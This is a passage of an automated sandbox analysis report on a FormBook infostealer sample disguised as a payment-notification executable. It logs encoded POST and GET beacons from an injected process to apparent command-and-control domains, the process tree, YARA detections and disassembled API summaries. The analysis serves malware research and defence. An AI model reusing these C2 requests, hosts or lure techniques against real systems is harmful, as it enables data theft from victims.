Jan 13, 2025 10:22:26.412976980 CET	465	OUT	GET /csd1/?z2=LHT8eHbp3J&idTDev6P=0h3WwWevRNaqBPz/dW1li3QIq8Phv/5H4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57VjJjxQ++03TYD8RIhl0tg+o7+6xEQ/Px7iI= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.rtp189z.lat Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:22:27.222404957 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:22:27 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 13, 2025 10:22:27.222455978 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50045	103.174.136.137	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:50.300527096 CET	750	OUT	POST /8m3y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.u75lmwdgp0du.homes Origin: http://www.u75lmwdgp0du.homes Referer: http://www.u75lmwdgp0du.homes/8m3y/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 7a 5a 56 44 71 67 42 7a 4f 33 51 58 55 45 45 69 71 77 55 67 4e 59 32 46 5a 79 43 4d 70 68 62 42 4d 63 46 34 6f 5a 76 6f 6a 71 6c 59 69 73 4d 37 75 48 56 43 51 67 72 45 43 45 42 58 52 64 37 44 4f 53 32 2f 48 6d 45 30 7a 4b 47 58 31 61 36 78 72 45 43 68 4d 33 58 62 4a 79 72 37 52 38 6b 47 78 76 49 43 44 67 78 36 42 59 73 71 57 6b 6d 4f 6f 69 54 57 78 2b 4d 64 70 47 2f 42 57 6a 74 63 38 63 4c 4c 47 2b 45 31 47 4a 64 39 62 51 76 44 5a 47 77 42 4c 6e 68 7a 78 6a 59 73 70 59 6d 31 6f 71 35 74 72 79 42 4a 62 41 48 48 32 33 6a 46 50 6c 4f 44 74 71 4e 61 6d 63 70 37 55 56 4a 38 75 41 3d 3d Data Ascii: idTDev6P=zZVDqgBzO3QXUEEiqwUgNY2FZyCMphbBMcF4oZvojqlYisM7uHVCQgrECEBXRd7DOS2/HmE0zKGX1a6xrEChM3XbJyr7R8kGxvICDgx6BYsqWkmOoiTWx+MdpG/BWjtc8cLLG+E1GJd9bQvDZGwBLnhzxjYspYm1oq5tryBJbAHH23jFPlODtqNamcp7UVJ8uA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50046	103.174.136.137	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:52.839616060 CET	770	OUT	POST /8m3y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.u75lmwdgp0du.homes Origin: http://www.u75lmwdgp0du.homes Referer: http://www.u75lmwdgp0du.homes/8m3y/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 7a 5a 56 44 71 67 42 7a 4f 33 51 58 47 30 30 69 6f 54 73 67 4b 34 32 47 48 43 43 4d 77 78 62 4e 4d 63 42 34 6f 59 72 34 6a 59 42 59 68 4f 6b 37 76 46 78 43 52 67 72 45 52 45 42 53 56 64 37 49 4f 53 36 33 48 69 59 30 7a 4b 53 58 31 65 32 78 72 33 36 69 65 58 58 5a 58 53 72 39 66 63 6b 47 78 76 49 43 44 67 4e 63 42 59 55 71 57 31 57 4f 71 44 54 52 39 65 4d 63 35 32 2f 42 53 6a 74 59 38 63 4c 70 47 36 64 61 47 50 52 39 62 56 54 44 5a 55 49 41 43 6e 68 78 76 54 5a 36 76 4c 66 39 6e 37 45 6a 6c 6b 42 62 55 44 76 54 2b 52 75 66 65 55 76 55 2f 71 70 70 37 62 67 50 5a 57 30 31 31 4a 67 6b 2b 68 64 79 32 30 43 74 31 76 59 46 2b 51 6c 64 39 43 63 3d Data Ascii: idTDev6P=zZVDqgBzO3QXG00ioTsgK42GHCCMwxbNMcB4oYr4jYBYhOk7vFxCRgrEREBSVd7IOS63HiY0zKSX1e2xr36ieXXZXSr9fckGxvICDgNcBYUqW1WOqDTR9eMc52/BSjtY8cLpG6daGPR9bVTDZUIACnhxvTZ6vLf9n7EjlkBbUDvT+RufeUvU/qpp7bgPZW011Jgk+hdy20Ct1vYF+Qld9Cc=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50047	103.174.136.137	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:55.391376019 CET	4944	OUT	POST /8m3y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.u75lmwdgp0du.homes Origin: http://www.u75lmwdgp0du.homes Referer: http://www.u75lmwdgp0du.homes/8m3y/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 7a 5a 56 44 71 67 42 7a 4f 33 51 58 47 30 30 69 6f 54 73 67 4b 34 32 47 48 43 43 4d 77 78 62 4e 4d 63 42 34 6f 59 72 34 6a 59 4a 59 68 2f 45 37 75 6c 4e 43 53 67 72 45 4b 6b 42 54 56 64 37 5a 4f 54 53 4e 48 6c 51 43 7a 4d 57 58 30 37 71 78 74 47 36 69 48 6e 58 5a 4e 79 72 34 52 38 6b 54 78 76 59 47 44 67 39 63 42 59 55 71 57 33 4f 4f 6b 43 54 52 37 65 4d 64 70 47 2f 4e 57 6a 73 2f 38 63 7a 54 47 36 49 6c 47 66 78 39 62 31 6a 44 62 6e 77 41 4e 6e 68 2f 75 54 5a 79 76 4b 6a 79 6e 36 6f 5a 6c 6b 64 31 55 41 7a 54 38 31 62 68 4e 57 37 50 38 35 68 6e 72 49 45 62 51 6e 6b 6c 32 59 73 6d 39 7a 42 4f 31 6e 79 52 33 63 77 4c 71 6c 6c 32 73 79 35 75 30 6e 31 44 33 75 58 48 6c 31 4f 4d 68 2b 35 73 55 57 64 67 2f 7a 47 74 4b 69 44 44 53 44 79 56 2b 34 73 37 4f 42 64 48 6c 54 48 36 4a 74 38 56 64 2f 67 37 36 49 7a 6d 72 45 64 6b 79 2b 61 77 4a 44 6d 68 48 66 49 58 61 64 2b 65 33 6e 79 6c 64 72 71 59 48 6d 7a 58 77 79 51 4c 41 75 2f 63 2b 49 47 2b 5a 55 67 6d 72 45 6a 52 65 56 6d 36 53 [TRUNCATED] Data Ascii: idTDev6P=zZVDqgBzO3QXG00ioTsgK42GHCCMwxbNMcB4oYr4jYJYh/E7ulNCSgrEKkBTVd7ZOTSNHlQCzMWX07qxtG6iHnXZNyr4R8kTxvYGDg9cBYUqW3OOkCTR7eMdpG/NWjs/8czTG6IlGfx9b1jDbnwANnh/uTZyvKjyn6oZlkd1UAzT81bhNW7P85hnrIEbQnkl2Ysm9zBO1nyR3cwLqll2sy5u0n1D3uXHl1OMh+5sUWdg/zGtKiDDSDyV+4s7OBdHlTH6Jt8Vd/g76IzmrEdky+awJDmhHfIXad+e3nyldrqYHmzXwyQLAu/c+IG+ZUgmrEjReVm6S9YTnK88UtCOy6MHUXxS0fxiYR3zPEBvGjZ78f1Wx1Dj4vD26Iia13Er3r8D69VLreHiA+6YHGIR7ud7LKRQlkqQVBDwMugQ7OFoRtXuIKnRrxxdwATTVbWRXRSdKPC+GVbqKs+EaurURTxBpyUq6AhtV8aObb1cXqRdrgExPsetvTiNphuEcdsB//WPqoqRA41hu7tGWsT0ZWHgkbPwnclWLa+jLlmfVMMps1woRMFYkV9rViEEg0M43EZKvHTU+racFsTwQrHysI/r7Cd2MJwMSzgNodfZzNzIjdfWCYwoafoCc6UQh6ibvRADt/BeSrUyLPrkbPaz/ayl1W6cVbKYYbJomdP4M4JLBRn9hnSXTnjpall0uPQLkY5wUPjM301wqaShEof7pOwyerhqeYIq+4Yyis8Cj6QUYrgkpjXPOWRhoQ8bwutGJjq5xIymV2UlvevDB4dhhsvljdGQ/cv/p+Q5X9JXDhf48IVGQYZ9/BZnJfTxjkL8ddLSk5/sFRQoucjsNQqcNgKpp/4sNb9ExCBtddv6SWK9XFm0RstyCHQXq5SUcm/nZw0FR5LEObWS4d6OgzwirJOUxjP93GSX2A3BkhoMlJKhola3SyvnySBQd6v+nWqbU3hL/XF6UNaTerInHy6/1tR8TJHHEYbtpMsOxyDNRIh [TRUNCATED]
Jan 13, 2025 10:22:55.391396999 CET	5908	OUT	Data Raw: 4a 35 76 52 61 4f 31 46 72 4a 50 5a 50 66 53 30 51 68 48 56 72 4f 42 41 41 31 52 68 6e 32 5a 7a 5a 4c 6b 77 73 7a 58 46 76 63 51 4b 78 34 49 53 36 56 53 63 64 69 48 70 63 5a 7a 36 53 4a 2f 39 4f 54 79 4a 59 50 70 37 6a 78 65 37 36 6e 44 63 45 61 Data Ascii: J5vRaO1FrJPZPfS0QhHVrOBAA1Rhn2ZzZLkwszXFvcQKx4IS6VScdiHpcZz6SJ/9OTyJYPp7jxe76nDcEat3BCebG+xW+M5u7cFqKU9s71pRvrPkYYnx1Wgns+9bJENpZB4VIZ+V2OOhO8j3TX+qaQPAM+3Llgr2gG3NQ2fJDpJlA3dvALC/xtyJPfM6RAdbDRD2R5PEn1UAtp60PDGpDtK8yqxFG76ixbRLQXsMBUe+nBfdJWO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50048	103.174.136.137	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:57.930140018 CET	472	OUT	GET /8m3y/?idTDev6P=+b9jpUpgOBw1R1sbmQNUSLWfWziv1WHHOphGnZ74l6djh+VypXV/SxbEO3x3Zf/CAjSFfUkl5YWJ6O7zhki1CEr+PCryGvo+//4gSAtBEtsQDlqalgX6+sA=&z2=LHT8eHbp3J HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.u75lmwdgp0du.homes Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)

Target ID:	0
Start time:	04:18:51
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"
Imagebase:	0x8e0000
File size:	1'619'968 bytes
MD5 hash:	24516ED0BCFF1BB18DD58DA6B6919C3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:18:52
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"
Imagebase:	0x9e0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:19:02
Start date:	13/01/2025
Path:	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe"
Imagebase:	0x830000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	04:19:04
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\w32tm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\w32tm.exe"
Imagebase:	0xe40000
File size:	92'672 bytes
MD5 hash:	E55B6A057FDDD35A7380FB2C6811A8EC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	04:19:18
Start date:	13/01/2025
Path:	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe"
Imagebase:	0x830000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	04:19:36
Start date:	13/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x830000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.4%
Total number of Nodes:	1575
Total number of Limit Nodes:	32

Executed Functions

Function 008E42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 008E430D

Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A

GetCurrentProcess.KERNEL32(?,0097CB64,00000000,?,?), ref: 008E4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 008E4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 008E4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008E4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 008E4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 008E447B
GetSystemInfo.KERNEL32(?,?,?), ref: 008E44A0

Strings

kernel32.dll, xrefs: 008E444F
GetNativeSystemInfo, xrefs: 008E4460
|O, xrefs: 009236F8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: b6c6e08a9c2c21f0e56a03c305565724206e58cb6f9309d4abc579037f9f06d2
Instruction ID: 8b9d0b73634e9a2dae175b204fd3060636daca614b9bb1f12b6a88ae64ac4ea0
Opcode Fuzzy Hash: b6c6e08a9c2c21f0e56a03c305565724206e58cb6f9309d4abc579037f9f06d2
Instruction Fuzzy Hash: 9CA1386293E3D4CFCB11C7797E611993FE8BB23324B8896ACE045D3B65F2240544EB25

Function 008E42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008E50AA,?,?,00000000,00000000), ref: 008E42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008E50AA,?,?,00000000,00000000), ref: 008E42C9
LoadResource.KERNEL32(?,00000000,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20), ref: 009235BE
SizeofResource.KERNEL32(?,00000000,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20), ref: 009235D3
LockResource.KERNEL32(008E50AA,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20,?), ref: 009235E6

Strings

SCRIPT, xrefs: 008E42BF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 15b357c303f6fee8be88a3c7a20a76786c0ccee08f45a49234efe3b1c0df2225
Instruction ID: 590c1de4852fdfe1458c5ed16eb2fdb8e6ac4c7853d34a2e057876c0959eacdc
Opcode Fuzzy Hash: 15b357c303f6fee8be88a3c7a20a76786c0ccee08f45a49234efe3b1c0df2225
Instruction Fuzzy Hash: 67117CB1200701BFD7218B66DC48F677BB9EBC6B51F14816DB51AD6260DBB2D8409620

Function 00922BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 008E2B6B

Part of subcall function 008E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1418,?,008E2E7F,?,?,?,00000000), ref: 008E3A78

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,009A2224), ref: 00922C10
ShellExecuteW.SHELL32(00000000,?,?,009A2224), ref: 00922C17

Strings

runas, xrefs: 00922C0B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 73ccaa3217b755507551c04851331623459df457cfa8cc4dc227c9754c98f46e
Instruction ID: d6d2c85ba532d3c0591ee8d83147d0cabd1a42942c63eadf50503f760bbb7c86
Opcode Fuzzy Hash: 73ccaa3217b755507551c04851331623459df457cfa8cc4dc227c9754c98f46e
Instruction Fuzzy Hash: 7811D231208381AAC714FF2AE8559AE77A9FBD3760F84042CF086931B2DF208A499753

Function 008ED730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 008ED807
timeGetTime.WINMM ref: 008EDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB28
TranslateMessage.USER32(?), ref: 008EDB7B
DispatchMessageW.USER32(?), ref: 008EDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB9F
Sleep.KERNEL32(0000000A), ref: 008EDBB1

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 07a59283f453ada26634326a8d187a728b75726562852d7ab77a58550cd40015
Instruction ID: 606a4f97238b29dd2b4339b2846161f1523580555396fbf6b47f8476b19d9345
Opcode Fuzzy Hash: 07a59283f453ada26634326a8d187a728b75726562852d7ab77a58550cd40015
Instruction Fuzzy Hash: 2542C070608385AFD728DF25C844B6ABBE4FF86314F14862DE595CB292D774E848DF82

Function 008E2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008E2D07
RegisterClassExW.USER32(00000030), ref: 008E2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E2D42
InitCommonControlsEx.COMCTL32(?), ref: 008E2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E2D6F
LoadIconW.USER32(000000A9), ref: 008E2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E2D94

Strings

TaskbarCreated, xrefs: 008E2D37
0, xrefs: 008E2CE9
+, xrefs: 008E2CF0
AutoIt v3 GUI, xrefs: 008E2D23

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

